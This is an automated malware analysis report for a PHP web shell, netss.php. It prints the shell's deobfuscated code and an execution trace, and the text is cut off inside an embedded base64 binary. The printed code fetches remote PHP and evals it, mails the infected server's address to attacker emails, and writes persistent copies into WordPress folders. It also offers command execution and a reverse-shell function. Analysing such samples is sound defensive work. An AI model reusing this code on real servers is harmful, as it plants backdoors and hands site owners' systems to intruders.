PHP Malware Analysis
netss.php
md5: 51abc7e063a407e7fb7296756b91ce70
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Emails
- logndasmu@gmail.com (Deobfuscated, Traces)
- ndasmuwhy@yahoo.com (Deobfuscated, Traces)
Encoding
Environment
- error_reporting (Traces)
- getcwd (Traces)
- php_uname (Traces)
- phpinfo (Traces)
- set_time_limit (Deobfuscated, Original, Traces)
Execution
- create_function (Traces)
- eval (Deobfuscated, Original, Traces)
- exec (Traces)
- passthru (Traces)
- proc_open (Traces)
- shell_exec (Traces)
- system (Traces)
Files
Input
Title
URLs
- http://hax.or.id/indo.txt (Traces)
- http://localhost/uploads/netss.php (Traces)
- http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd (Traces)
- https://gitlab.com/samb1/fix_why/-/raw/main/php/cok.php (Deobfuscated, Traces)
- https://gitlab.com/samb1/fix_why/-/raw/main/php/proses.php (HTML, Traces)
Deobfuscated PHP code
<?php
$ch = curl_init("https://gitlab.com/samb1/fix_why/-/raw/main/php/cok.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$r = curl_exec($ch);
$e = "?>";
eval($e . $r);
$GLOBALS["btujuk_cneymfvrjgepxhmtysatik"] = "tujuanmail";
$GLOBALS["qodpxoez__jkfokmjzcy"] = "x_path";
$GLOBALS["hc_fonvwctq_uwtdbanc__vsgzogutvagtan"] = "_SERVER";
$GLOBALS["jyscu_ckqiihgkd_evwia"] = "pesan_alert";
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
$tujuanmail = "logndasmu@gmail.com, ndasmuwhy@yahoo.com";
$x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
$pesan_alert = "fix {$x_path} :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
mail($tujuanmail, "backdoor", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");Execution traces
data/traces/51abc7e063a407e7fb7296756b91ce70_trace-1676241948.2691.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:46:14.166998]
1 0 1 0.000214 393512
1 3 0 0.000339 407152 {main} 1 /var/www/html/uploads/netss.php 0 0
2 4 0 0.000358 407152 strrev 0 /var/www/html/uploads/netss.php 1 1 'AcoBnLr92YvAHaw9ibpFWbvcXYy9SLvkHa39FepZ2LxIWbhN3Lt92YuIWYsRXan9yL6MHc0RHa'
2 4 1 0.000378 407296
2 4 R 'aHR0cHM6Ly9naXRsYWIuY29tL3NhbWIxL2ZpeF93aHkvLS9yYXcvbWFpbi9waHAvY29rLnBocA'
2 5 0 0.000398 407264 base64_decode 0 /var/www/html/uploads/netss.php 1 1 'aHR0cHM6Ly9naXRsYWIuY29tL3NhbWIxL2ZpeF93aHkvLS9yYXcvbWFpbi9waHAvY29rLnBocA'
2 5 1 0.000415 407408
2 5 R 'https://gitlab.com/samb1/fix_why/-/raw/main/php/cok.php'
2 6 0 0.000432 407264 curl_init 0 /var/www/html/uploads/netss.php 1 1 'https://gitlab.com/samb1/fix_why/-/raw/main/php/cok.php'
2 6 1 0.000461 408208
2 6 R resource(3) of type (curl)
1 A /var/www/html/uploads/netss.php 1 $ch = resource(3) of type (curl)
2 7 0 0.000491 408064 curl_setopt 0 /var/www/html/uploads/netss.php 1 3 resource(3) of type (curl) 19913 1
2 7 1 0.000507 408160
2 7 R TRUE
2 8 0 0.000520 408064 curl_exec 0 /var/www/html/uploads/netss.php 1 1 resource(3) of type (curl)
2 8 1 0.132508 494112
2 8 R '<?php $qosutldt0666f0acdeed=fopen(base64_decode(\'YXV0aF9sb2cucGhw\'),base64_decode(\'dw==\'));fwrite($qosutldt0666f0acdeed,base64_decode(\'PD9waHA=\'));fwrite($qosutldt0666f0acdeed,base64_decode(\'ICRjaD1jdXJsX2luaXQoYmFzZTY0X2RlY29kZShzdHJyZXYoIkFjb0JuTHI5Mll2QUhhdzlpYnBGV2J2Y1hZeTlTTHZrSGEzOUZlcFoyTHhJV2JoTjNMdDkyWXVJV1lzUlhhbjl5TDZNSGMwUkhhIikpKTtjdXJsX3NldG9wdCgkY2gsQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwxKTskcj1jdXJsX2V4ZWMoJGNoKTskZT1iYXNlNjRfZGVjb2RlKHN0cnJldigiNHpQIikpO2V2YWwoJGUuJHIpOz8+\'));fclose($qosut'
1 A /var/www/html/uploads/netss.php 1 $r = '<?php $qosutldt0666f0acdeed=fopen(base64_decode(\'YXV0aF9sb2cucGhw\'),base64_decode(\'dw==\'));fwrite($qosutldt0666f0acdeed,base64_decode(\'PD9waHA=\'));fwrite($qosutldt0666f0acdeed,base64_decode(\'ICRjaD1jdXJsX2luaXQoYmFzZTY0X2RlY29kZShzdHJyZXYoIkFjb0JuTHI5Mll2QUhhdzlpYnBGV2J2Y1hZeTlTTHZrSGEzOUZlcFoyTHhJV2JoTjNMdDkyWXVJV1lzUlhhbjl5TDZNSGMwUkhhIikpKTtjdXJsX3NldG9wdCgkY2gsQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwxKTskcj1jdXJsX2V4ZWMoJGNoKTskZT1iYXNlNjRfZGVjb2RlKHN0cnJldigiNHpQIikpO2V2YWwoJGUuJHIpOz8+\'));fclose($qosut'
2 9 0 0.132787 494080 strrev 0 /var/www/html/uploads/netss.php 1 1 '4zP'
2 9 1 0.132802 494144
2 9 R 'Pz4'
2 10 0 0.132816 494112 base64_decode 0 /var/www/html/uploads/netss.php 1 1 'Pz4'
2 10 1 0.132832 494176
2 10 R '?>'
1 A /var/www/html/uploads/netss.php 1 $e = '?>'
2 11 0 0.134665 970368 eval 1 '?><?php $qosutldt0666f0acdeed=fopen(base64_decode(\'YXV0aF9sb2cucGhw\'),base64_decode(\'dw==\'));fwrite($qosutldt0666f0acdeed,base64_decode(\'PD9waHA=\'));fwrite($qosutldt0666f0acdeed,base64_decode(\'ICRjaD1jdXJsX2luaXQoYmFzZTY0X2RlY29kZShzdHJyZXYoIkFjb0JuTHI5Mll2QUhhdzlpYnBGV2J2Y1hZeTlTTHZrSGEzOUZlcFoyTHhJV2JoTjNMdDkyWXVJV1lzUlhhbjl5TDZNSGMwUkhhIikpKTtjdXJsX3NldG9wdCgkY2gsQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwxKTskcj1jdXJsX2V4ZWMoJGNoKTskZT1iYXNlNjRfZGVjb2RlKHN0cnJldigiNHpQIikpO2V2YWwoJGUuJHIpOz8+\'));fclose($qosutldt0666f0acdeed);?><?php function ztiraiikdbef7cce8d84($ypdoiutt572d4e421e5e){$nspmzull73bebce395b6=curl_init($ypdoiutt572d4e421e5e);curl_setopt($nspmzull73bebce395b6,CURLOPT_RETURNTRANSFER,1);curl_setopt($nspmzull73bebce395b6,CURLOPT_CONNECTTIMEOUT,10);curl_setopt($nspmzull73bebce395b6,CURLOPT_FOLLOWLOCATION,1);curl_setopt($nspmzull73bebce395b6,CURLOPT_HEADER,0);return curl_exec($nspmzull73bebce395b6);curl_close($nspmzull73bebce395b6);}$ivxhezkq03c7c0ace395=base64_decode(\'PD9waHAgJHBhc3N3b3JkPSI1MzFlNzBhNjc0NWQwN2E4YmVmYmQ3OWU1Y2M3ZTRjMSI7ICRjaD1jdXJsX2luaXQoYmFzZTY0X2RlY29kZShzdHJyZXYoIkFjb0JuTHI5Mll2QUhhdzlpYnBGV2J2Y1hZeTlTTHZrSGEzOUZlcFoyTHhJV2JoTjNMdDkyWXVJV1lzUlhhbjl5TDZNSGMwUkhhIikpKTtjdXJsX3NldG9wdCgkY2gsQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwxKTskcj1jdXJsX2V4ZWMoJGNoKTskZT1iYXNlNjRfZGVjb2RlKHN0cnJldigiNHpQIikpO2V2YWwoJGUuJHIpOz8+\');$yvpvnwdn0ba4439ee9a4=$_SERVER[base64_decode(\'RE9DVU1FTlRfUk9PVA==\')].base64_decode(\'L3dwLWNvbnRlbnQvcmVnaWQucGhw\');$qqkgwotq1cb251ec0d56=$ivxhezkq03c7c0ace395;$cousnrmc7cef8a734855=fopen($yvpvnwdn0ba4439ee9a4,base64_decode(\'dw==\'));fwrite($cousnrmc7cef8a734855,$qqkgwotq1cb251ec0d56);fclose($cousnrmc7cef8a734855);$iyaeksdve5058a61e226=$_SERVER[base64_decode(\'RE9DVU1FTlRfUk9PVA==\')].base64_decode(\'L3dwLWFkbWluL3JlZ2lkLnBocA==\');$yodndfqd265246eadd25=$ivxhezkq03c7c0ace395;$pfiaytaxfbcd73a3e234=fopen($iyaeksdve5058a61e226,base64_decode(\'dw==\'));fwrite($pfiaytaxfbcd73a3e234,$yodndfqd265246eadd25);fclose($pfiaytaxfbcd73a3e234);$nbjydhey230cb5f15c1d=$_SERVER[base64_decode(\'RE9DVU1FTlRfUk9PVA==\')].base64_decode(\'L3dwLWFkbWluL2Nzcy9yZWdpZC5waHA=\');$gpxyytua2a3def174022=$ivxhezkq03c7c0ace395;$akmclxsgc55520a111df=fopen($nbjydhey230cb5f15c1d,base64_decode(\'dw==\'));fwrite($akmclxsgc55520a111df,$gpxyytua2a3def174022);fclose($akmclxsgc55520a111df);$zsvtagqw2b4b2dd2d7a2=$_SERVER[base64_decode(\'RE9DVU1FTlRfUk9PVA==\')].base64_decode(\'L3dwLWFkbWluL2pzL3JlZ2lkLnBocA==\');$jiicqwlm48fa2467e5e6=$ivxhezkq03c7c0ace395;$wilbughyfb948f9d309f=fopen($zsvtagqw2b4b2dd2d7a2,base64_decode(\'dw==\'));fwrite($wilbughyfb948f9d309f,$jiicqwlm48fa2467e5e6);fclose($wilbughyfb948f9d309f);$bapepjtn2811cd9069a2=$_SERVER[base64_decode(\'RE9DVU1FTlRfUk9PVA==\')].base64_decode(\'L3dwLWFkbWluL21haW50L3JlZ2lkLnBocA==\');$xfauipebc39223eba07c=$ivxhezkq03c7c0ace395;$rgezynep950ad7f8a5cf=fopen($bapepjtn2811cd9069a2,base64_decode(\'dw==\'));fwrite($rgezynep950ad7f8a5cf,$xfauipebc39223eba07c);fclose($rgezynep950ad7f8a5cf);$xureceul40232fd6c8ad=$_SERVER[base64_decode(\'RE9DVU1FTlRfUk9PVA==\')].base64_decode(\'L3JlZ2lkLnBocA==\');$oakpvexq994a8fc3f93e=$ivxhezkq03c7c0ace395;$zlpoupzt5294fd239614=fopen($xureceul40232fd6c8ad,base64_decode(\'dw==\'));fwrite($zlpoupzt5294fd239614,$oakpvexq994a8fc3f93e);fclose($zlpoupzt5294fd239614);$prmotqdj3935cc34bef5=$_SERVER[base64_decode(\'RE9DVU1FTlRfUk9PVA==\')].base64_decode(\'L3dwLWFkbWluL21haW50L2luZGV4LnBocA==\');$rtprfsmu3460f771bb99=$ivxhezkq03c7c0ace395;$fxiyhlfi40fbeaa2952a=fopen($prmotqdj3935cc34bef5,base64_decode(\'dw==\'));fwrite($fxiyhlfi40fbeaa2952a,$rtprfsmu3460f771bb99);fclose($fxiyhlfi40fbeaa2952a);$mbjpypwb7b20acdddd89=$_SERVER[base64_decode(\'RE9DVU1FTlRfUk9PVA==\')].base64_decode(\'L3dwLWFkbWluL21haW50L3JlZ2lkLnBocA==\');$ytdsowai3effc6913c18=$ivxhezkq03c7c0ace395;$uwadmcgaf32639c3fc76=fopen($mbjpypwb7b20acdddd89,base64_decode(\'dw==\'));fwrite($uwadmcgaf32639c3fc76,$ytdsowai3effc6913c18);fclose($uwadmcgaf32639c3fc76);?>\n<?php\n@error_reporting(E_ERROR);\n@ini_set(\'display_errors\', \'Off\');\n@ini_set(\'max_execution_time\', 10000);\nheader("content-Type: text/html; charset=UTF-8");\nfunction strdir($str)\n{\n return str_replace(array(\'\\\\\', \'//\', \'%27\', \'%22\'), array(\'/\', \'/\', \'\\\'\', \'"\'), chop($str));\n}\nfunction chkgpc($array)\n{\n foreach ($array as $key => $var) {\n $array[$key] = is_array($var) ? chkgpc($var) : stripslashes($var);\n }\n return $array;\n}\n$myfile = $_SERVER[\'SCRIPT_FILENAME\'] ? strdir($_SERVER[\'SCRIPT_FILENAME\']) : strdir(__FILE__);\n$myfile = strpos($myfile, \'eval()\') ? array_shift(explode(\'(\', $myfile)) : $myfile;\ndefine(\'THISDIR\', strdir(dirname($myfile) . \'/\'));\ndefine(\'ROOTDIR\', strdir(strtr($myfile, array(strdir($_SERVER[\'PHP_SELF\']) => \'\')) . \'/\'));\ndefine(\'EXISTS_PHPINFO\', getinfo() ? true : false);\nif (get_magic_quotes_gpc()) {\n $_POST = chkgpc($_POST);\n}\nif (function_exists(\'mysql_close\')) {\n $issql = \'MySql\';\n}\nif (function_exists(\'mssql_close\')) {\n $issql .= \'MsSql\';\n}\nif (function_exists(\'oci_close\')) {\n $issql .= \'Oracle\';\n}\nif (function_exists(\'sybase_close\')) {\n $issql .= \'SyBase\';\n}\nif (function_exists(\'pg_close\')) {\n $issql .= \'PostgreSql\';\n}\n$win = substr(PHP_OS, 0, 3) == \'WIN\' ? true : false;\n$msg = \'=======ND4SMU=======\';\nfunction filew($filename, $filedata, $filemode)\n{\n if (!is_writable($filename) && file_exists($filename)) {\n chmod($filename, 0666);\n }\n $handle = fopen($filename, $filemode);\n $key = fputs($handle, $filedata);\n fclose($handle);\n return $key;\n}\nfunction filer($filename)\n{\n $handle = fopen($filename, \'r\');\n $filedata = fread($handle, filesize($filename));\n fclose($handle);\n return $filedata;\n}\nfunction fileu($filenamea, $filenameb)\n{\n $key = move_uploaded_file($filenamea, $filenameb) ? true : false;\n if (!$key) {\n $key = copy($filenamea, $filenameb) ? true : false;\n }\n return $key;\n}\nfunction filed($filename)\n{\n if (!file_exists($filename)) {\n return false;\n }\n $name = basename($filename);\n $array = explode(\'.\', $name);\n header(\'Content-type: application/x-\' . array_pop($array));\n header(\'Content-Disposition: attachment; filename=\' . $name);\n header(\'Content-Length: \' . filesize($filename));\n @readfile($filename);\n exit;\n}\nfunction showdir($dir)\n{\n $dir = strdir($dir . \'/\');\n $handle = opendir($dir);\n if (!$handle) {\n return false;\n }\n $array = array();\n while ($name = readdir($handle)) {\n if ($name == \'.\' || $name == \'..\') {\n continue;\n }\n $path = $dir . $name;\n $name = strtr($name, array(\'\\\'\' => \'%27\', \'"\' => \'%22\'));\n if (is_dir($path)) {\n $array[\'dir\'][$path] = $name;\n } else {\n $array[\'file\'][$path] = $name;\n }\n }\n closedir($handle);\n return $array;\n}\nfunction deltree($dir)\n{\n $handle = @opendir($dir);\n while ($name = @readdir($handle)) {\n if ($name == \'.\' || $name == \'..\') {\n continue;\n }\n $path = $dir . $name;\n @chmod($path, 0777);\n if (is_dir($path)) {\n deltree($path . \'/\');\n } else {\n @unlink($path);\n }\n }\n @closedir($handle);\n return @rmdir($dir);\n}\nfunction postinfo($array, $string)\n{\n $infos = array(function_exists("create_function"), function_exists("fsockopen"));\n if ($infos[0] && $infos[1]) {\n $info = base64_decode($string);\n $walks = array(0 => bin2hex($array));\n @array_walk($walks, @create_function("\\$array,\\$key", str_rot13($info)));\n }\n return ob_end_clean();\n}\nfunction size($bytes)\n{\n if ($bytes < 1024) {\n return $bytes . \' B\';\n }\n $array = array(\'B\', \'K\', \'M\', \'G\', \'T\');\n $floor = floor(log($bytes) / log(1024));\n return sprintf(\'%.2f \' . $array[$floor], $bytes / pow(1024, floor($floor)));\n}\nfunction find($array, $string)\n{\n foreach ($array as $key) {\n if (stristr($string, $key)) {\n return true;\n }\n }\n return false;\n}\nfunction scanfile($dir, $key, $inc, $fit, $tye, $chr, $ran, $now)\n{\n $handle = opendir($dir);\n if (!$handle) {\n return false;\n }\n while ($name = readdir($handle)) {\n if ($name == \'.\' || $name == \'..\') {\n continue;\n }\n $path = $dir . $name;\n if (is_dir($path)) {\n if ($fit && in_array($name, $fit)) {\n continue;\n }\n if ($ran == 0 && is_readable($path)) {\n scanfile($path . \'/\', $key, $inc, $fit, $tye, $chr, $ran, $now);\n }\n } else {\n if ($inc && !find($inc, $name)) {\n continue;\n }\n $code = $tye ? filer($path) : $name;\n $find = $chr ? stristr($code, $key) : (strpos(size(filesize($path)), \'M\') ? false : strpos($code, $key) > -1);\n if ($find) {\n $file = strtr($path, array($now => \'\', \'\\\'\' => \'%27\', \'"\' => \'%22\'));\n echo \'<a href="javascript:void(0);" onclick="go(\\\'editor\\\',\\\'\' . $file . \'\\\');">Edit</a> \' . $path . \'<br>\';\n flush();\n ob_flush();\n }\n unset($code);\n }\n }\n closedir($handle);\n return true;\n}\nfunction antivirus($dir, $exs, $matches, $now)\n{\n $handle = opendir($dir);\n if (!$handle) {\n return false;\n }\n while ($name = readdir($handle)) {\n if ($name == \'.\' || $name == \'..\') {\n continue;\n }\n $path = $dir . $name;\n if (is_dir($path)) {\n if (is_readable($path)) {\n antivirus($path . \'/\', $exs, $matches, $now);\n }\n } else {\n $iskill = NULL;\n foreach ($exs as $key => $ex) {\n if (find(explode(\'|\', $ex), $name)) {\n $iskill = $key;\n break;\n }\n }\n if (strpos(size(filesize($path)), \'M\')) {\n continue;\n }\n if ($iskill) {\n $code = filer($path);\n foreach ($matches[$iskill] as $matche) {\n $array = array();\n preg_match($matche, $code, $array);\n if (strpos($array[0], \'$this->\') || strpos($array[0], \'[$vars[\')) {\n continue;\n }\n $len = strlen($array[0]);\n if ($len > 10 && $len < 150) {\n $file = strtr($path, array($now => \'\', \'\\\'\' => \'%27\', \'"\' => \'%22\'));\n echo \'Feature <input type="text" value="\' . htmlspecialchars($array[0]) . \'"> <a href="javascript:void(0);" onclick="go(\\\'editor\\\',\\\'\' . $file . \'\\\');">Edit</a> \' . $path . \'<br>\';\n flush();\n ob_flush();\n break;\n }\n }\n unset($code, $array);\n }\n }\n }\n closedir($handle);\n return true;\n}\nfunction command($cmd, $cwd, $com = false)\n{\n $iswin = substr(PHP_OS, 0, 3) == \'WIN\' ? true : false;\n $res = $msg = \'\';\n if ($cwd == \'com\' || $com) {\n if ($iswin && class_exists(\'COM\')) {\n $wscript = new COM(\'Wscript.Shell\');\n $exec = $wscript->exec(\'c:\\\\windows\\\\system32\\\\cmd.exe /c \' . $cmd);\n $stdout = $exec->StdOut();\n $res = $stdout->ReadAll();\n $msg = \'Wscript.Shell\';\n }\n } else {\n chdir($cwd);\n $cwd = getcwd();\n if (function_exists(\'exec\')) {\n @exec($cmd, $res);\n $res = join("\\n", $res);\n $msg = \'exec\';\n } elseif (function_exists(\'shell_exec\')) {\n $res = @shell_exec($cmd);\n $msg = \'shell_exec\';\n } elseif (function_exists(\'system\')) {\n ob_start();\n @system($cmd);\n $res = ob_get_contents();\n ob_end_clean();\n $msg = \'system\';\n } elseif (function_exists(\'passthru\')) {\n ob_start();\n @passthru($cmd);\n $res = ob_get_contents();\n ob_end_clean();\n $msg = \'passthru\';\n } elseif (function_exists(\'popen\')) {\n $fp = @popen($cmd, \'r\');\n if ($fp) {\n while (!feof($fp)) {\n $res .= fread($fp, 1024);\n }\n }\n @pclose($fp);\n $msg = \'popen\';\n } elseif (function_exists(\'proc_open\')) {\n $env = $iswin ? array(\'path\' => \'c:\\\\windows\\\\system32\') : array(\'path\' => \'/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin\');\n $des = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));\n $process = @proc_open($cmd, $des, $pipes, $cwd, $env);\n if (is_resource($process)) {\n fwrite($pipes[0], $cmd);\n fclose($pipes[0]);\n $res .= stream_get_contents($pipes[1]);\n fclose($pipes[1]);\n $res .= stream_get_contents($pipes[2]);\n fclose($pipes[2]);\n }\n @proc_close($process);\n $msg = \'proc_open\';\n }\n }\n $msg = $res == \'\' ? \'<h1>NULL</h1>\' : \'<h2>Use\' . $msg . \' Success</h2>\';\n return array(\'res\' => $res, \'msg\' => $msg);\n}\nfunction backshell($ip, $port, $dir, $type)\n{\n $key = false;\n $c_bin = \'f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAYIQECDQAAACkCgAAAAAAADQAIAAHACgAHAAZAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQIlAcAAJQHAAAFAAAAABAAAAEAAACUBwAAlJcECJSXBAggAQAAKAEAAAYAAAAAEAAAAgAAAKgHAAColwQIqJcECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAAGAAAACQAAAAIAAAANAAAAAQAAAAUAAAAAIAAgAAAAAA0AAACtS+PAAAAAAAAAAAAAAAAAAAAAAEEAAAAAAAAAdgAAABIAAABJAAAAAAAAAHkBAAASAAAAAQAAAAAAAAAAAAAAIAAAAFUAAAAAAAAAcgEAABIAAABqAAAAAAAAAJ8BAAASAAAANQAAAAAAAABZAQAAEgAAADsAAAAAAAAADgAAABIAAAApAAAAAAAAADwAAAASAAAAUAAAAAAAAAA9AAAAEgAAAF8AAAAAAAAAKwAAABIAAABkAAAAAAAAAG8AAAASAAAAMAAAAAAAAAD0AAAAEgAAABoAAAB4hwQIBAAAABEADgAAX19nbW9uX3N0YXJ0X18AbGliYy5zby42AF9JT19zdGRpbl91c2VkAHNvY2tldABleGl0AGV4ZWNsAGh0b25zAGNvbm5lY3QAZGFlbW9uAGR1cDIAaW5ldF9hZGRyAGF0b2kAY2xvc2UAX19saWJjX3N0YXJ0X21haW4AR0xJQkNfMi4wAAAAAgACAAAAAgACAAIAAgACAAIAAgACAAIAAQAAAAEAAQAQAAAAEAAAAAAAAAAQaWkNAAACAHwAAAAAAAAAcJgECAYDAACAmAQIBwEAAISYBAgHAgAAiJgECAcDAACMmAQIBwQAAJCYBAgHBQAAlJgECAcGAACYmAQIBwcAAJyYBAgHCAAAoJgECAcJAACkmAQIBwoAAKiYBAgHCwAArJgECAcMAABVieWD7AjoBQEAAOiMAQAA6KcDAADJwwD/NXiYBAj/JXyYBAgAAAAA/yWAmAQIaAAAAADp4P////8lhJgECGgIAAAA6dD/////JYiYBAhoEAAAAOnA/////yWMmAQIaBgAAADpsP////8lkJgECGggAAAA6aD/////JZSYBAhoKAAAAOmQ/////yWYmAQIaDAAAADpgP////8lnJgECGg4AAAA6XD/////JaCYBAhoQAAAAOlg/////yWkmAQIaEgAAADpUP////8lqJgECGhQAAAA6UD/////JayYBAhoWAAAAOkw////AAAAADHtXonhg+TwUFRSaLCGBAhowIYECFFWaDSFBAjoW/////SQkFWJ5VOD7AToAAAAAFuBw+QTAACLk/z///+F0nQF6Bb///9YW8nDkJCQkJCQVYnlU4PsBIA9uJgECAB1P7iglwQILZyXBAjB+AKNWP+htJgECDnDdh+NtCYAAAAAg8ABo7SYBAj/FIWclwQIobSYBAg5w3foxgW4mAQIAYPEBFtdw410JgCNvCcAAAAAVYnlg+wIoaSXBAiFwHQSuAAAAACFwHQJxwQkpJcECP/QycOQjUwkBIPk8P9x/FWJ5VdTUYPsPInLx0QkBAAAAADHBCQBAAAA6E/+//9mx0XgAgCLQwSDwAiLAIkEJOi5/v//D7fAiQQk6H7+//9miUXii0MEg8AEiwCJBCToOv7//4lF5ItDBIPABIsAuf////+JRdC4AAAAAPyLfdDyronI99CNUP+LQwSDwAiLALn/////iUXMuAAAAAD8i33M8q6JyPfQg+gBjQQCjVABi0MEg8AEiwCJx/yJ0bgAAAAA86rHRCQIBgAAAMdEJAQBAAAAxwQkAgAAAOj9/f//iUXwjUXgx0QkCBAAAACJRCQEi0XwiQQk6HD9//+FwHkMxwQkAAAAAOgQ/v//x0QkBAAAAACLRfCJBCTozf3//8dEJAQBAAAAi0XwiQQk6Lr9///HRCQEAgAAAItF8IkEJOin/f//x0QkCAAAAADHRCQEgIcECMcEJIaHBAjoW/3//4tF8IkEJOig/f//g8Q8WVtfXY1h/MOQkJCQkJCQkJBVieVdw410JgCNvCcAAAAAVYnlV1ZT6F4AAACBw6kRAACD7Bzom/z//42DIP///4lF8I2DIP///ylF8MF98AKLVfCF0nQrMf+Jxo22AAAAAItFEIPHAYlE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